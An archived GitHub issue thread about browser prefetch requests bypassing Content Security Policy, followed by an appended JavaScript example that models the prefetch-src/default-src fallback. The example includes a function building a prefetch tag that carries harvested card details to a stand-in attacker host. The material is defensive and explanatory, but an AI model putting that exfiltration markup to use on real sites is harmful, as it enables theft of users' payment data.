This repository was archived by the owner on Jun 30, 2023. It is now read-only.

Why is prefetching ignoring CSP and allowing connections to 3rd party destinations? #73

Closed
ri0t opened this issue Jan 7, 2018 · 2 comments

Comments

@ri0t

ri0t commented Jan 7, 2018

Since I can send (and I tested this in Chromium 63) prefetch requests formed to my liking to any site, an attacker can send stolen information (stolen by other means, e.g. a malicious npm package or injected code) to his receiving endpoint, which obviously opens the door to many bad attack situations.

How do you plan to mitigate this? Apparently all the benefits of CSP are nullified by this behaviour.

For a rough PoC and more explanations, see here:
https://hackernoon.com/im-harvesting-credit-card-numbers-and-passwords-from-your-site-here-s-how-9a8cb347c5b5

(I sure hope the guy isn't doing this, as claimed. But Reddit correctly states: if he isn't doing it, someone else has surely started by now.)

Greetings,
@Hackerfleet - @ri0t

Edit: This may be just a bug in Chrome; I'd restate the issue on the corresponding bug trackers if you think so, too. Firefox is, as far as I can tell, not affected by this.

@yoavweiss
Contributor

Correct behavior here is being discussed in w3c/webappsec-csp#107

Once the right behavior is decided, we'll indeed need to fix the relevant specs and implementations will need to align.

@yoavweiss
Contributor

The discussions were concluded and prefetch needs to be subject to prefetch-src.
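The following is an added example, not code from this thread, the linked article, the spec repository or any browser. It models in JavaScript (Node) the directive lookup the thread ends on, namely that a prefetch is governed by prefetch-src and, when that directive is absent, by default-src, and shows why the reporter's policy in the first comment did not help: a policy that only sets connect-src, script-src and similar fetch directives leaves prefetch ungoverned. Source-expression matching is deliberately simplified (scheme, host and port only; no paths, nonces or hashes), and every origin, policy header and "harvested" value below is constructed for the demonstration. Which browsers actually enforce prefetch-src is not something the thread states, so the evaluator models the agreed behaviour, not any particular implementation.

```javascript
// Added example: a minimal CSP evaluator for prefetch requests.
// Fallback chain modelled: prefetch-src -> default-src -> (nothing: allowed).
// Simplifications (assumptions): no path matching, no nonce/hash sources,
// host-source without a scheme matches the page's scheme or an https upgrade.

const DEFAULT_PORTS = { "http:": "80", "https:": "443", "ws:": "80", "wss:": "443" };

// Parse "directive src src; directive src" into a Map; the first occurrence of a
// directive name wins and names are case-insensitive, as in the CSP grammar.
function parseCsp(header) {
  const policy = new Map();
  for (const token of header.split(";")) {
    const [name, ...sources] = token.trim().split(/\s+/).filter(Boolean);
    if (name && !policy.has(name.toLowerCase())) policy.set(name.toLowerCase(), sources);
  }
  return policy;
}

// Reduce a URL to the tuple CSP host matching cares about.
function originOf(url) {
  const u = new URL(url);
  return { scheme: u.protocol, host: u.hostname.toLowerCase(), port: u.port || DEFAULT_PORTS[u.protocol] || "" };
}

// Does one source expression permit a request to `target` from a page at `self`?
function sourceMatches(expr, target, self) {
  if (expr.startsWith("'")) {
    // Keyword sources: only 'self' can match a host; 'none' and the rest never do here.
    return expr === "'self'" &&
      target.scheme === self.scheme && target.host === self.host && target.port === self.port;
  }
  if (expr === "*") return true;
  if (/^[a-z][a-z0-9+.-]*:$/i.test(expr)) return target.scheme === expr.toLowerCase(); // scheme-source, e.g. "https:"
  // host-source: [scheme://][*.]host[:port|:*]
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([a-z0-9-]+(?:\.[a-z0-9-]+)*)(?::(\d+|\*))?$/i.exec(expr);
  if (!m) return false;
  const [, scheme, wildcard, host, port] = m;
  const schemeOk = scheme
    ? target.scheme === scheme.toLowerCase() + ":"
    : target.scheme === self.scheme || (self.scheme === "http:" && target.scheme === "https:");
  const hostOk = wildcard
    ? target.host.endsWith("." + host.toLowerCase())
    : target.host === host.toLowerCase();
  const portOk = port === "*" ? true
    : port ? target.port === port
    : target.port === (DEFAULT_PORTS[target.scheme] || "");
  return schemeOk && hostOk && portOk;
}

// First directive in the fallback chain that the policy actually sets, or null.
function governingDirective(policy, name, fallbacks) {
  for (const n of [name, ...fallbacks]) if (policy.has(n)) return n;
  return null;
}

// Decide whether a <link rel=prefetch href=targetUrl> on a page at pageOrigin is
// permitted by the given CSP header. `by` names the directive that decided it.
function prefetchAllowed(header, pageOrigin, targetUrl) {
  const policy = parseCsp(header);
  const directive = governingDirective(policy, "prefetch-src", ["default-src"]);
  if (directive === null) return { allowed: true, by: null }; // nothing governs prefetch: the gap the issue reports
  const self = originOf(pageOrigin), target = originOf(targetUrl);
  const allowed = policy.get(directive).some((s) => sourceMatches(s, target, self));
  return { allowed, by: directive };
}

// Attacker view (constructed): the markup a malicious dependency would inject, carrying
// harvested form values in the query string of a prefetch to its own endpoint.
function prefetchExfilMarkup(endpoint, stolen) {
  const u = new URL(endpoint);
  u.searchParams.set("d", JSON.stringify(stolen)); // URL-encoded, so the attribute cannot be broken out of
  return `<link rel="prefetch" href="${u.href}">`;
}

// Demonstration on constructed data (hypothetical hosts and a fake card number).
const PAGE = "https://shop.example";
const EXFIL = "https://collector.attacker.example/c";
const STOLEN = { card: "4111111111111111", cvv: "123" };
const POLICIES = {
  weak: "connect-src 'self'; script-src 'self'; img-src 'self'",   // prefetch not covered at all
  fixed: "default-src 'self'; connect-src 'self'; script-src 'self'", // default-src catches it
  explicit: "default-src *; prefetch-src 'self' https://cdn.shop.example", // prefetch-src overrides a permissive default
};
for (const [label, csp] of Object.entries(POLICIES)) {
  console.log(label, prefetchAllowed(csp, PAGE, EXFIL));
}
console.log(prefetchExfilMarkup(EXFIL, STOLEN));
```

The `weak` policy is the situation the first comment describes: every fetch directive the author thought of is locked to `'self'`, yet `prefetchAllowed` returns `allowed: true` with `by: null` because no directive governs the prefetch. Adding `default-src 'self'` or an explicit `prefetch-src` closes it, and `prefetch-src` wins over a permissive `default-src` because it is consulted first in the fallback chain.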
